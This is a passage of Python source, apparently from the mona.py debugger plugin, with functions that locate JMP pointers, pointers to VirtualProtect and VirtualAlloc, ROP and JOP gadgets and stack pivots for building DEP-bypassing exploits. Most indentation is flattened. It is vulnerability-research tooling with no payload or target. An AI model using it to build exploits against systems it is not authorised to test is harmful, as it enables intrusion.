dbg.log(" - Search complete, processing results")
dbg.updateLog()
return all_opcodes
def findJMP(modulecriteria={},criteria={},register="esp"):
"""
Performs a search for pointers to jump to a given register
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
Default settings are : ignore aslr and rebased modules
criteria - dictionary with criteria the pointers need to comply with.
register - the register to jump to
Return:
Dictionary (pointers)
"""
search = getSearchSequences("jmp",register,"",criteria)
found_opcodes = {}
all_opcodes = {}
modulestosearch = getModulesToQuery(modulecriteria)
if not silent:
dbg.log("[+] Querying %d modules" % len(modulestosearch))
starttime = datetime.datetime.now()
for thismodule in modulestosearch:
if not silent:
dbg.log(" - Querying module %s" % thismodule)
dbg.updateLog()
#search
found_opcodes = searchInModule(search,thismodule,criteria)
#merge results
all_opcodes = mergeOpcodes(all_opcodes,found_opcodes)
if not silent:
dbg.log(" - Search complete, processing results")
dbg.updateLog()
return all_opcodes
def findROPFUNC(modulecriteria={},criteria={},searchfuncs=[]):
"""
Performs a search for pointers to pointers to interesting functions to facilitate a ROP exploit
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
Default settings are : ignore aslr and rebased modules
criteria - dictionary with criteria the pointers need to comply with.
optional :
searchfuncs - array with functions to include in the search
Return:
Dictionary (pointers)
"""
found_opcodes = {}
all_opcodes = {}
ptr_counter = 0
ropfuncs = {}
funccallresults = []
ropfuncoffsets = {}
functionnames = []
offsets = {}
modulestosearch = getModulesToQuery(modulecriteria)
if searchfuncs == []:
functionnames = ["virtualprotect","virtualalloc","heapalloc","winexec","setprocessdeppolicy","heapcreate","setinformationprocess","writeprocessmemory","memcpy","memmove","strncpy","createmutex","getlasterror","strcpy","loadlibrary","freelibrary","getmodulehandle","getprocaddress","openfile","createfile","createfilemapping","mapviewoffile","openfilemapping"]
offsets["kernel32.dll"] = ["virtualprotect","virtualalloc","writeprocessmemory"]
# on newer OSes, functions are stored in kernelbase.dll
offsets["kernelbase.dll"] = ["virtualprotect","virtualalloc","writeprocessmemory"]
else:
functionnames = searchfuncs
offsets["kernel32.dll"] = searchfuncs
# on newer OSes, functions are stored in kernelbase.dll
offsets["kernelbase.dll"] = searchfuncs
if not silent:
dbg.log("[+] Looking for pointers to interesting functions...")
curmod = ""
#ropfuncfilename="ropfunc.txt"
#objropfuncfile = MnLog(ropfuncfilename)
#ropfuncfile = objropfuncfile.reset()
offsetpointers = {}
# populate absolute pointers
for themod in offsets:
fnames = offsets[themod]
try:
themodule = MnModule(themod)
if not themodule is None:
allfuncs = themodule.getEAT()
for fn in allfuncs:
for fname in fnames:
if allfuncs[fn].lower().find(fname.lower()) > -1:
#dbg.log("Found match: %s %s -> %s ?" % (themod, allfuncs[fn].lower(), fname.lower()))
fname = allfuncs[fn].lower()
if not fname in offsetpointers:
offsetpointers[fname] = fn
break
except:
continue
# found pointers to functions
# now query IATs
#dbg.log("%s" % modulecriteria)
isrebased = False
for key in modulestosearch:
curmod = dbg.getModule(key)
#dbg.log("Searching in IAT of %s" % key)
#is this module going to get rebase ?
themodule = MnModule(key)
isrebased = themodule.isRebase
if not silent:
dbg.log(" - Querying %s" % (key))
allfuncs = themodule.getIAT()
dbg.updateLog()
for fn in allfuncs:
thisfuncname = allfuncs[fn].lower()
thisfuncfullname = thisfuncname
if not meetsCriteria(MnPointer(fn), criteria):
continue
ptr = 0
try:
ptr=struct.unpack('<L',dbg.readMemory(fn,4))[0]
except:
pass
if ptr != 0:
# get offset to one of the offset functions
# where does pointer belong to ?
pmodname = MnPointer(ptr).belongsTo()
if pmodname != "":
if pmodname.lower() in offsets:
# find distance to each of the interesting functions in this module
for interestingfunc in offsets[pmodname.lower()]:
if interestingfunc in offsetpointers:
offsetvalue = offsetpointers[interestingfunc] - ptr
operator = ""
if offsetvalue < 0:
operator = "-"
offsetvaluehex = toHex(offsetvalue).replace("-","")
thetype = "(%s - IAT 0x%s : %s.%s (0x%s), offset to %s.%s (0x%s) : %d (%s0x%s)" % (key,toHex(fn),pmodname,thisfuncfullname,toHex(ptr),pmodname,interestingfunc,toHex(offsetpointers[interestingfunc]),offsetvalue,operator,offsetvaluehex)
if not thetype in ropfuncoffsets:
ropfuncoffsets[thetype] = [fn]
# see if it's a function we are looking for
for funcsearch in functionnames:
funcsearch = funcsearch.lower()
if thisfuncname.find(funcsearch) > -1:
extra = ""
extrafunc = ""
if isrebased:
extra = " [Warning : module is likely to get rebased !]"
extrafunc = "-rebased"
if not silent:
dbg.log(" 0x%s : ptr to %s (0x%s) (%s) %s" % (toHex(fn),thisfuncname,toHex(ptr),key,extra))
logtxt = thisfuncfullname.lower().strip()+extrafunc+" | 0x" + toHex(ptr)
if logtxt in ropfuncs:
ropfuncs[logtxt] += [fn]
else:
ropfuncs[logtxt] = [fn]
ptr_counter += 1
if ptr_to_get > 0 and ptr_counter >= ptr_to_get:
                            return ropfuncs,ropfuncoffsets
return ropfuncs,ropfuncoffsets
def assemble(instructions,encoder=""):
"""
Assembles one or more instructions to opcodes
Arguments:
instructions = the instructions to assemble (separated by #)
Return:
    String with the assembled opcodes, in \x-escaped notation
"""
if not silent:
dbg.log("Opcode results : ")
dbg.log("---------------- ")
allopcodes=""
instructions = instructions.replace('"',"").replace("'","")
splitter=re.compile('#')
instructions=splitter.split(instructions)
for instruct in instructions:
try:
instruct = instruct.strip()
assembled=dbg.assemble(instruct)
strAssembled=""
for assemOpc in assembled:
if (len(hex(ord(assemOpc)))) == 3:
subAssembled = "\\x0"+hex(ord(assemOpc)).replace('0x','')
strAssembled = strAssembled+subAssembled
else:
strAssembled = strAssembled+hex(ord(assemOpc)).replace('0x', '\\x')
if len(strAssembled) < 30:
if not silent:
dbg.log(" %s = %s" % (instruct,strAssembled))
allopcodes=allopcodes+strAssembled
else:
if not silent:
dbg.log(" %s => Unable to assemble this instruction !" % instruct,highlight=1)
except:
if not silent:
dbg.log(" Could not assemble %s " % instruct)
pass
if not silent:
dbg.log(" Full opcode : %s " % allopcodes)
return allopcodes
def findROPGADGETS(modulecriteria={},criteria={},endings=[],maxoffset=40,depth=5,split=False,pivotdistance=0,fast=False,mode="all"):
"""
Searches for rop gadgets
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
Default settings are : ignore aslr and rebased modules
criteria - dictionary with criteria the pointers need to comply with.
endings - array with all rop gadget endings to look for. Default : RETN and RETN+offsets
maxoffset - maximum offset value for RETN if endings are set to RETN
depth - maximum number of instructions to go back
split - Boolean that indicates whether routine should write all gadgets to one file, or split per module
pivotdistance - minimum distance a stackpivot needs to be
    fast - Boolean; when set to True, the less interesting 'other' gadgets are not kept or written to file
mode - internal use only
Return:
Output is written to files, containing rop gadgets, suggestions, stack pivots and virtualprotect/virtualalloc routine (if possible)
"""
found_opcodes = {}
all_opcodes = {}
ptr_counter = 0
modulestosearch = getModulesToQuery(modulecriteria)
progressid=str(dbg.getDebuggedPid())
progressfilename="_rop_progress_"+dbg.getDebuggedName()+"_"+progressid+".log"
objprogressfile = MnLog(progressfilename)
progressfile = objprogressfile.reset()
dbg.log("[+] Progress will be written to %s" % progressfilename)
dbg.log("[+] Maximum offset : %d" % maxoffset)
dbg.log("[+] (Minimum/optional maximum) stackpivot distance : %s" % str(pivotdistance))
dbg.log("[+] Max nr of instructions : %d" % depth)
dbg.log("[+] Split output into module rop files ? %s" % split)
usefiles = False
filestouse = []
vplogtxt = ""
suggestions = {}
if "f" in criteria:
if criteria["f"] <> "":
if type(criteria["f"]).__name__.lower() != "bool":
usefiles = True
rawfilenames = criteria["f"].replace('"',"")
allfiles = rawfilenames.split(',')
#check if files exist
dbg.log("[+] Attempting to use %d rop file(s) as input" % len(allfiles))
for fname in allfiles:
fname = fname.strip()
if not os.path.exists(fname):
dbg.log(" ** %s : Does not exist !" % fname, highlight=1)
else:
filestouse.append(fname)
if len(filestouse) == 0:
dbg.log(" ** Unable to find any of the source files, aborting... **", highlight=1)
return
search = []
if not usefiles:
if len(endings) == 0:
#RETN only
search.append("RETN")
for i in range(0, maxoffset + 1, 2):
search.append("RETN 0x"+ toHexByte(i))
else:
for ending in endings:
dbg.log("[+] Custom ending : %s" % ending)
if ending != "":
search.append(ending)
if len(modulestosearch) == 0:
dbg.log("[-] No modules selected, aborting search", highlight = 1)
return
dbg.log("[+] Enumerating %d endings in %d module(s)..." % (len(search),len(modulestosearch)))
for thismodule in modulestosearch:
dbg.log(" - Querying module %s" % thismodule)
dbg.updateLog()
#search
found_opcodes = searchInModule(search,thismodule,criteria)
#merge results
all_opcodes = mergeOpcodes(all_opcodes,found_opcodes)
dbg.log(" - Search complete :")
else:
dbg.log("[+] Reading input files")
for filename in filestouse:
dbg.log(" - Reading %s" % filename)
all_opcodes = mergeOpcodes(all_opcodes,readGadgetsFromFile(filename))
dbg.updateLog()
tp = 0
for endingtype in all_opcodes:
if len(all_opcodes[endingtype]) > 0:
if usefiles:
dbg.log(" Ending : %s, Nr found : %d" % (endingtype,len(all_opcodes[endingtype]) / 2))
tp = tp + len(all_opcodes[endingtype]) / 2
else:
dbg.log(" Ending : %s, Nr found : %d" % (endingtype,len(all_opcodes[endingtype])))
tp = tp + len(all_opcodes[endingtype])
global silent
if not usefiles:
dbg.log(" - Filtering and mutating %d gadgets" % tp)
else:
dbg.log(" - Categorizing %d gadgets" % tp)
silent = True
dbg.updateLog()
ropgadgets = {}
interestinggadgets = {}
stackpivots = {}
stackpivots_safeseh = {}
adcnt = 0
tc = 1
issafeseh = False
step = 0
updateth = 1000
if (tp >= 2000 and tp < 5000):
updateth = 500
if (tp < 2000):
updateth = 100
for endingtype in all_opcodes:
if len(all_opcodes[endingtype]) > 0:
for endingtypeptr in all_opcodes[endingtype]:
adcnt=adcnt+1
if usefiles:
adcnt = adcnt - 0.5
if adcnt > (tc*updateth):
thistimestamp=datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
updatetext = " - Progress update : " + str(tc*updateth) + " / " + str(tp) + " items processed (" + thistimestamp + ") - (" + str((tc*updateth*100)/tp)+"%)"
objprogressfile.write(updatetext.strip(),progressfile)
dbg.log(updatetext)
dbg.updateLog()
tc += 1
if not usefiles:
#first get max backward instruction
thisopcode = dbg.disasmBackward(endingtypeptr,depth+1)
thisptr = thisopcode.getAddress()
# we now have a range to mine
startptr = thisptr
currentmodulename = MnPointer(thisptr).belongsTo()
modinfo = MnModule(currentmodulename)
issafeseh = modinfo.isSafeSEH
while startptr <= endingtypeptr and startptr != 0x0:
# get the entire chain from startptr to endingtypeptr
thischain = ""
msfchain = []
thisopcodebytes = ""
chainptr = startptr
if isGoodGadgetPtr(startptr,criteria) and not startptr in ropgadgets and not startptr in interestinggadgets:
invalidinstr = False
while chainptr < endingtypeptr and not invalidinstr:
thisopcode = dbg.disasm(chainptr)
thisinstruction = getDisasmInstruction(thisopcode)
if isGoodGadgetInstr(thisinstruction) and not isGadgetEnding(thisinstruction,search):
thischain = thischain + " # " + thisinstruction
msfchain.append([chainptr,thisinstruction])
thisopcodebytes = thisopcodebytes + opcodesToHex(thisopcode.getDump().lower())
chainptr = dbg.disasmForwardAddressOnly(chainptr,1)
else:
invalidinstr = True
if endingtypeptr == chainptr and startptr != chainptr and not invalidinstr:
fullchain = thischain + " # " + endingtype
msfchain.append([endingtypeptr,endingtype])
thisopcode = dbg.disasm(endingtypeptr)
thisopcodebytes = thisopcodebytes + opcodesToHex(thisopcode.getDump().lower())
msfchain.append(["raw",thisopcodebytes])
if isInterestingGadget(fullchain):
interestinggadgets[startptr] = fullchain
#this may be a good stackpivot too
stackpivotdistance = getStackPivotDistance(fullchain,pivotdistance)
if stackpivotdistance > 0:
#safeseh or not ?
if issafeseh:
if not stackpivotdistance in stackpivots_safeseh:
stackpivots_safeseh.setdefault(stackpivotdistance,[[startptr,fullchain]])
else:
stackpivots_safeseh[stackpivotdistance] += [[startptr,fullchain]]
else:
if not stackpivotdistance in stackpivots:
stackpivots.setdefault(stackpivotdistance,[[startptr,fullchain]])
else:
stackpivots[stackpivotdistance] += [[startptr,fullchain]]
else:
if not fast:
ropgadgets[startptr] = fullchain
startptr = startptr+1
else:
if step == 0:
startptr = endingtypeptr
if step == 1:
thischain = endingtypeptr
chainptr = startptr
ptrx = MnPointer(chainptr)
modname = ptrx.belongsTo()
issafeseh = False
if modname != "":
thism = MnModule(modname)
issafeseh = thism.isSafeSEH
if isGoodGadgetPtr(startptr,criteria) and not startptr in ropgadgets and not startptr in interestinggadgets:
fullchain = thischain
if isInterestingGadget(fullchain):
interestinggadgets[startptr] = fullchain
#this may be a good stackpivot too
stackpivotdistance = getStackPivotDistance(fullchain,pivotdistance)
if stackpivotdistance > 0:
#safeseh or not ?
if issafeseh:
if not stackpivotdistance in stackpivots_safeseh:
stackpivots_safeseh.setdefault(stackpivotdistance,[[startptr,fullchain]])
else:
stackpivots_safeseh[stackpivotdistance] += [[startptr,fullchain]]
else:
if not stackpivotdistance in stackpivots:
stackpivots.setdefault(stackpivotdistance,[[startptr,fullchain]])
else:
stackpivots[stackpivotdistance] += [[startptr,fullchain]]
else:
if not fast:
ropgadgets[startptr] = fullchain
step = -1
step += 1
thistimestamp = datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
updatetext = " - Progress update : " + str(tp) + " / " + str(tp) + " items processed (" + thistimestamp + ") - (100%)"
objprogressfile.write(updatetext.strip(),progressfile)
dbg.log(updatetext)
dbg.updateLog()
if mode == "all":
if len(ropgadgets) > 0 and len(interestinggadgets) > 0:
# another round of filtering
updatetext = "[+] Creating suggestions list"
dbg.log(updatetext)
objprogressfile.write(updatetext.strip(),progressfile)
suggestions = getRopSuggestion(interestinggadgets,ropgadgets)
#see if we can propose something
updatetext = "[+] Processing suggestions"
dbg.log(updatetext)
objprogressfile.write(updatetext.strip(),progressfile)
suggtowrite=""
for suggestedtype in suggestions:
limitnr = 0x7fffffff
if suggestedtype.startswith("pop "): # only write up to 10 pop r32 into suggestions file
limitnr = 10
gcnt = 0
suggtowrite += "[%s]\n" % suggestedtype
for suggestedpointer in suggestions[suggestedtype]:
if gcnt < limitnr:
sptr = MnPointer(suggestedpointer)
modname = sptr.belongsTo()
modinfo = MnModule(modname)
if not modinfo.moduleBase.__class__.__name__ == "instancemethod":
rva = suggestedpointer - modinfo.moduleBase
suggesteddata = suggestions[suggestedtype][suggestedpointer]
if not modinfo.moduleBase.__class__.__name__ == "instancemethod":
ptrinfo = "0x" + toHex(suggestedpointer) + " (RVA : 0x" + toHex(rva) + ") : " + suggesteddata + " ** [" + modname + "] ** | " + sptr.__str__()+"\n"
else:
ptrinfo = "0x" + toHex(suggestedpointer) + " : " + suggesteddata + " ** [" + modname + "] ** | " + sptr.__str__()+"\n"
suggtowrite += ptrinfo
else:
break
gcnt += 1
dbg.log("[+] Launching ROP generator")
updatetext = "Attempting to create rop chain proposals"
objprogressfile.write(updatetext.strip(),progressfile)
vplogtxt = createRopChains(suggestions,interestinggadgets,ropgadgets,modulecriteria,criteria,objprogressfile,progressfile)
dbg.logLines(vplogtxt.replace("\t"," "))
dbg.log(" ROP generator finished")
else:
updatetext = "[+] Oops, no gadgets found, aborting.."
dbg.log(updatetext)
objprogressfile.write(updatetext.strip(),progressfile)
#done, write to log files
dbg.setStatusBar("Writing to logfiles...")
dbg.log("")
logfile = MnLog("stackpivot.txt")
thislog = logfile.reset()
objprogressfile.write("Writing " + str(len(stackpivots)+len(stackpivots_safeseh))+" stackpivots with minimum offset " + str(pivotdistance)+" to file " + thislog,progressfile)
dbg.log("[+] Writing stackpivots to file " + thislog)
logfile.write("Stack pivots, minimum distance " + str(pivotdistance),thislog)
logfile.write("-------------------------------------",thislog)
logfile.write("Non-safeSEH protected pivots :",thislog)
logfile.write("------------------------------",thislog)
arrtowrite = ""
pivotcount = 0
try:
with open(thislog,"a") as fh:
arrtowrite = ""
stackpivots_index = sorted(stackpivots) # returns sorted keys as an array
for sdist in stackpivots_index:
for spivot, schain in stackpivots[sdist]:
ptrx = MnPointer(spivot)
modname = ptrx.belongsTo()
sdisthex = "%02x" % sdist
ptrinfo = "0x" + toHex(spivot) + " : {pivot " + str(sdist) + " / 0x" + sdisthex + "} : " + schain + " ** [" + modname + "] ** | " + ptrx.__str__()+"\n"
pivotcount += 1
arrtowrite += ptrinfo
fh.writelines(arrtowrite)
except:
pass
logfile.write("SafeSEH protected pivots :",thislog)
logfile.write("--------------------------",thislog)
arrtowrite = ""
try:
with open(thislog, "a") as fh:
arrtowrite = ""
stackpivots_safeseh_index = sorted(stackpivots_safeseh)
for sdist in stackpivots_safeseh_index:
for spivot, schain in stackpivots_safeseh[sdist]:
ptrx = MnPointer(spivot)
modname = ptrx.belongsTo()
#modinfo = MnModule(modname)
sdisthex = "%02x" % sdist
ptrinfo = "0x" + toHex(spivot) + " : {pivot " + str(sdist) + " / 0x" + sdisthex + "} : " + schain + " ** [" + modname + "] ** | " + ptrx.__str__()+"\n"
pivotcount += 1
arrtowrite += ptrinfo
fh.writelines(arrtowrite)
except:
pass
dbg.log(" Wrote %d pivots to file " % pivotcount)
arrtowrite = ""
if mode == "all":
if len(suggestions) > 0:
logfile = MnLog("rop_suggestions.txt")
thislog = logfile.reset()
objprogressfile.write("Writing all suggestions to file "+thislog,progressfile)
dbg.log("[+] Writing suggestions to file " + thislog )
logfile.write("Suggestions",thislog)
logfile.write("-----------",thislog)
with open(thislog, "a") as fh:
fh.writelines(suggtowrite)
fh.write("\n")
nrsugg = len(suggtowrite.split("\n"))
dbg.log(" Wrote %d suggestions to file" % nrsugg)
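	# when 'split' is not requested, all gadgets go to a single rop.txt;
	# otherwise results are grouped per module into rop_<modulename>_<version>.txt files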
if not split:
logfile = MnLog("rop.txt")
thislog = logfile.reset()
objprogressfile.write("Gathering interesting gadgets",progressfile)
dbg.log("[+] Writing results to file " + thislog + " (" + str(len(interestinggadgets))+" interesting gadgets)")
logfile.write("Interesting gadgets",thislog)
logfile.write("-------------------",thislog)
dbg.updateLog()
try:
with open(thislog, "a") as fh:
arrtowrite = ""
for gadget in interestinggadgets:
ptrx = MnPointer(gadget)
modname = ptrx.belongsTo()
#modinfo = MnModule(modname)
ptrinfo = "0x" + toHex(gadget) + " : " + interestinggadgets[gadget] + " ** [" + modname + "] ** | " + ptrx.__str__()+"\n"
arrtowrite += ptrinfo
objprogressfile.write("Writing results to file " + thislog + " (" + str(len(interestinggadgets))+" interesting gadgets)",progressfile)
fh.writelines(arrtowrite)
dbg.log(" Wrote %d interesting gadgets to file" % len(interestinggadgets))
except:
pass
arrtowrite=""
if not fast:
objprogressfile.write("Enumerating other gadgets (" + str(len(ropgadgets))+")",progressfile)
dbg.log("[+] Writing other gadgets to file " + thislog + " (" + str(len(ropgadgets))+" gadgets)")
try:
logfile.write("",thislog)
logfile.write("Other gadgets",thislog)
logfile.write("-------------",thislog)
with open(thislog, "a") as fh:
arrtowrite=""
for gadget in ropgadgets:
ptrx = MnPointer(gadget)
modname = ptrx.belongsTo()
#modinfo = MnModule(modname)
ptrinfo = "0x" + toHex(gadget) + " : " + ropgadgets[gadget] + " ** [" + modname + "] ** | " + ptrx.__str__()+"\n"
arrtowrite += ptrinfo
dbg.log(" Wrote %d other gadgets to file" % len(ropgadgets))
objprogressfile.write("Writing results to file " + thislog + " (" + str(len(ropgadgets))+" other gadgets)",progressfile)
fh.writelines(arrtowrite)
except:
pass
else:
dbg.log("[+] Writing results to individual files (grouped by module)")
dbg.updateLog()
for thismodule in modulestosearch:
thismodname = thismodule.replace(" ","_")
thismodversion = getModuleProperty(thismodule,"version")
logfile = MnLog("rop_"+thismodname+"_"+thismodversion+".txt")
thislog = logfile.reset()
logfile.write("Interesting gadgets",thislog)
logfile.write("-------------------",thislog)
for gadget in interestinggadgets:
ptrx = MnPointer(gadget)
modname = ptrx.belongsTo()
modinfo = MnModule(modname)
thismodversion = getModuleProperty(modname,"version")
thismodname = modname.replace(" ","_")
logfile = MnLog("rop_"+thismodname+"_"+thismodversion+".txt")
thislog = logfile.reset(False)
ptrinfo = "0x" + toHex(gadget) + " : " + interestinggadgets[gadget] + " ** " + modinfo.__str__() + " ** | " + ptrx.__str__()+"\n"
with open(thislog, "a") as fh:
fh.write(ptrinfo)
if not fast:
for thismodule in modulestosearch:
thismodname = thismodule.replace(" ","_")
thismodversion = getModuleProperty(thismodule,"version")
					logfile = MnLog("rop_"+thismodname+"_"+thismodversion+".txt")
					thislog = logfile.reset(False)
					logfile.write("Other gadgets",thislog)
logfile.write("-------------",thislog)
for gadget in ropgadgets:
ptrx = MnPointer(gadget)
modname = ptrx.belongsTo()
modinfo = MnModule(modname)
thismodversion = getModuleProperty(modname,"version")
thismodname = modname.replace(" ","_")
logfile = MnLog("rop_"+thismodname+"_"+thismodversion+".txt")
thislog = logfile.reset(False)
ptrinfo = "0x" + toHex(gadget) + " : " + ropgadgets[gadget] + " ** " + modinfo.__str__() + " ** | " + ptrx.__str__()+"\n"
with open(thislog, "a") as fh:
fh.write(ptrinfo)
thistimestamp=datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
objprogressfile.write("Done (" + thistimestamp+")",progressfile)
dbg.log("Done")
return interestinggadgets,ropgadgets,suggestions,vplogtxt
#----- JOP gadget finder ----- #
def findJOPGADGETS(modulecriteria={},criteria={},depth=6):
"""
Searches for jop gadgets
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
Default settings are : ignore aslr and rebased modules
criteria - dictionary with criteria the pointers need to comply with.
depth - maximum number of instructions to go back
Return:
Output is written to files, containing jop gadgets and suggestions
"""
found_opcodes = {}
all_opcodes = {}
ptr_counter = 0
modulestosearch = getModulesToQuery(modulecriteria)
progressid=toHex(dbg.getDebuggedPid())
progressfilename="_jop_progress_"+dbg.getDebuggedName()+"_"+progressid+".log"
objprogressfile = MnLog(progressfilename)
progressfile = objprogressfile.reset()
dbg.log("[+] Progress will be written to %s" % progressfilename)
dbg.log("[+] Max nr of instructions : %d" % depth)
filesok = 0
usefiles = False
filestouse = []
vplogtxt = ""
suggestions = {}
fast = False
search = []
jopregs = ["EAX","EBX","ECX","EDX","ESI","EDI","EBP"]
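	# build the list of JOP gadget endings below : direct "JMP <reg>", indirect "JMP [<reg>]",
	# and "JMP [<reg>+offset]" / "JMP [ESP+offset]" for even offsets 0x00 - 0x28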
offsetval = 0
for jreg in jopregs:
search.append("JMP " + jreg)
search.append("JMP [" + jreg + "]")
for offsetval in range(0, 40+1, 2):
search.append("JMP [" + jreg + "+0x" + toHexByte(offsetval)+"]")
search.append("JMP [ESP]")
for offsetval in range(0, 40+1, 2):
search.append("JMP [ESP+0x" + toHexByte(offsetval) + "]")
dbg.log("[+] Enumerating %d endings in %d module(s)..." % (len(search),len(modulestosearch)))
for thismodule in modulestosearch:
dbg.log(" - Querying module %s" % thismodule)
dbg.updateLog()
#search
found_opcodes = searchInModule(search,thismodule,criteria)
#merge results
all_opcodes = mergeOpcodes(all_opcodes,found_opcodes)
dbg.log(" - Search complete :")
dbg.updateLog()
tp = 0
for endingtype in all_opcodes:
if len(all_opcodes[endingtype]) > 0:
if usefiles:
dbg.log(" Ending : %s, Nr found : %d" % (endingtype,len(all_opcodes[endingtype]) / 2))
tp = tp + len(all_opcodes[endingtype]) / 2
else:
dbg.log(" Ending : %s, Nr found : %d" % (endingtype,len(all_opcodes[endingtype])))
tp = tp + len(all_opcodes[endingtype])
global silent
dbg.log(" - Filtering and mutating %d gadgets" % tp)
dbg.updateLog()
jopgadgets = {}
interestinggadgets = {}
adcnt = 0
tc = 1
issafeseh = False
step = 0
for endingtype in all_opcodes:
if len(all_opcodes[endingtype]) > 0:
for endingtypeptr in all_opcodes[endingtype]:
adcnt += 1
if usefiles:
adcnt = adcnt - 0.5
if adcnt > (tc*1000):
thistimestamp=datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
updatetext = " - Progress update : " + str(tc*1000) + " / " + str(tp) + " items processed (" + thistimestamp + ") - (" + str((tc*1000*100)/tp)+"%)"
objprogressfile.write(updatetext.strip(),progressfile)
dbg.log(updatetext)
dbg.updateLog()
tc += 1
#first get max backward instruction
thisopcode = dbg.disasmBackward(endingtypeptr,depth+1)
thisptr = thisopcode.getAddress()
# we now have a range to mine
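				# walk every candidate start address in [thisptr, endingtypeptr]; a chain is only kept
				# when all of its instructions are valid JOP gadget instructions and disassembly from
				# the start address lands exactly on the gadget ending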
startptr = thisptr
while startptr <= endingtypeptr and startptr != 0x0:
# get the entire chain from startptr to endingtypeptr
thischain = ""
msfchain = []
thisopcodebytes = ""
chainptr = startptr
if isGoodGadgetPtr(startptr,criteria) and not startptr in jopgadgets and not startptr in interestinggadgets:
# new pointer
invalidinstr = False
while chainptr < endingtypeptr and not invalidinstr:
thisopcode = dbg.disasm(chainptr)
thisinstruction = getDisasmInstruction(thisopcode)
if isGoodJopGadgetInstr(thisinstruction) and not isGadgetEnding(thisinstruction,search):
thischain = thischain + " # " + thisinstruction
msfchain.append([chainptr,thisinstruction])
thisopcodebytes = thisopcodebytes + opcodesToHex(thisopcode.getDump().lower())
chainptr = dbg.disasmForwardAddressOnly(chainptr,1)
else:
invalidinstr = True
if endingtypeptr == chainptr and startptr != chainptr and not invalidinstr:
fullchain = thischain + " # " + endingtype
msfchain.append([endingtypeptr,endingtype])
thisopcode = dbg.disasm(endingtypeptr)
thisopcodebytes = thisopcodebytes + opcodesToHex(thisopcode.getDump().lower())
msfchain.append(["raw",thisopcodebytes])
if isInterestingJopGadget(fullchain):
interestinggadgets[startptr] = fullchain
else:
if not fast:
jopgadgets[startptr] = fullchain
startptr = startptr+1
thistimestamp=datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
updatetext = " - Progress update : " + str(tp) + " / " + str(tp) + " items processed (" + thistimestamp + ") - (100%)"
objprogressfile.write(updatetext.strip(),progressfile)
dbg.log(updatetext)
dbg.updateLog()
logfile = MnLog("jop.txt")
thislog = logfile.reset()
objprogressfile.write("Enumerating gadgets",progressfile)
dbg.log("[+] Writing results to file " + thislog + " (" + str(len(interestinggadgets))+" interesting gadgets)")
logfile.write("Interesting gadgets",thislog)
logfile.write("-------------------",thislog)
dbg.updateLog()
arrtowrite = ""
try:
with open(thislog, "a") as fh:
arrtowrite = ""
for gadget in interestinggadgets:
ptrx = MnPointer(gadget)
modname = ptrx.belongsTo()
modinfo = MnModule(modname)
ptrinfo = "0x" + toHex(gadget) + " : " + interestinggadgets[gadget] + " ** " + modinfo.__str__() + " ** | " + ptrx.__str__()+"\n"
arrtowrite += ptrinfo
objprogressfile.write("Writing results to file " + thislog + " (" + str(len(interestinggadgets))+" interesting gadgets)",progressfile)
fh.writelines(arrtowrite)
except:
pass
return interestinggadgets,jopgadgets,suggestions,vplogtxt
#----- File compare ----- #
def findFILECOMPARISON(modulecriteria={},criteria={},allfiles=[],tomatch="",checkstrict=True,rangeval=0,fast=False):
"""
Compares two or more files generated with mona.py and lists the entries that have been found in all files
Arguments:
modulecriteria = not used
criteria = not used
allfiles = array with filenames to compare
tomatch = variable containing a string each line should contain
	checkstrict = Boolean, when set to True, both the pointer and the instructions should be exactly the same
	rangeval = if not 0, every reference pointer is expanded with all addresses within +/- rangeval bytes before comparing
	fast = Boolean, when set to True, only the pointers (without instructions) are written to the output files
Return:
File containing all matching pointers
"""
dbg.setStatusBar("Comparing files...")
dbg.updateLog()
filenotfound = False
for fcnt in xrange(len(allfiles)):
fname = allfiles[fcnt]
fname = fname.strip()
if os.path.exists(fname):
dbg.log(" - %d. %s" % (fcnt, allfiles[fcnt]))
else:
dbg.log(" ** %s : Does not exist !" % allfiles[fcnt], highlight=1)
filenotfound = True
if filenotfound:
return
objcomparefile = MnLog("filecompare.txt")
comparefile = objcomparefile.reset()
objcomparefilenot = MnLog("filecompare_not.txt")
comparefilenot = objcomparefilenot.reset()
objcomparefilenot.write("Source files:",comparefilenot)
for fcnt in xrange(len(allfiles)):
objcomparefile.write(" - " + str(fcnt)+". "+allfiles[fcnt],comparefile)
objcomparefilenot.write(" - " + str(fcnt)+". "+allfiles[fcnt],comparefilenot)
objcomparefile.write("",comparefile)
objcomparefile.write("Pointers found :",comparefile)
objcomparefile.write("----------------",comparefile)
objcomparefilenot.write("",comparefilenot)
objcomparefilenot.write("Pointers not found :",comparefilenot)
objcomparefilenot.write("-------------------",comparefilenot)
# transform the files into dictionaries
dbg.log("[+] Reading input files ...")
all_input_files = {}
all_pointers = {}
fcnt = 0
for thisfile in allfiles:
filedata = {}
content = []
with open(thisfile,"rb") as inputfile:
content = inputfile.readlines()
pointerlist = []
for thisLine in content:
refpointer,instr = splitToPtrInstr(thisLine)
instr = instr.replace('\n','').replace('\r','').strip(":")
if refpointer != -1 and not refpointer in filedata:
filedata[refpointer] = instr
pointerlist.append(refpointer)
all_input_files[fcnt] = filedata
all_pointers[fcnt] = pointerlist
fcnt += 1
# select smallest one
dbg.log("[+] Finding shortest array, to use as the reference")
shortestarray = 0
shortestlen = 0
for inputfile in all_input_files:
if (len(all_input_files[inputfile]) < shortestlen) or (shortestlen == 0):
shortestlen = len(all_input_files[inputfile])
shortestarray = inputfile
dbg.log(" Reference file: %s (%d pointers)" % (allfiles[shortestarray],shortestlen))
fileorder = []
fileorder.append(shortestarray)
cnt = 0
while cnt <= len(all_input_files):
if not cnt in fileorder:
fileorder.append(cnt)
cnt += 1
remaining = []
fulllist = []
if rangeval == 0:
dbg.log("[+] Starting compare, please wait...")
dbg.updateLog()
fcnt = 1
remaining = all_pointers[shortestarray]
fulllist = all_pointers[shortestarray]
while fcnt < len(fileorder)-1 and len(remaining) > 0:
dbg.log(" Comparing %d reference pointers with %s" % (len(remaining),allfiles[fileorder[fcnt]]))
remaining = list(set(remaining).intersection(set(all_pointers[fileorder[fcnt]])))
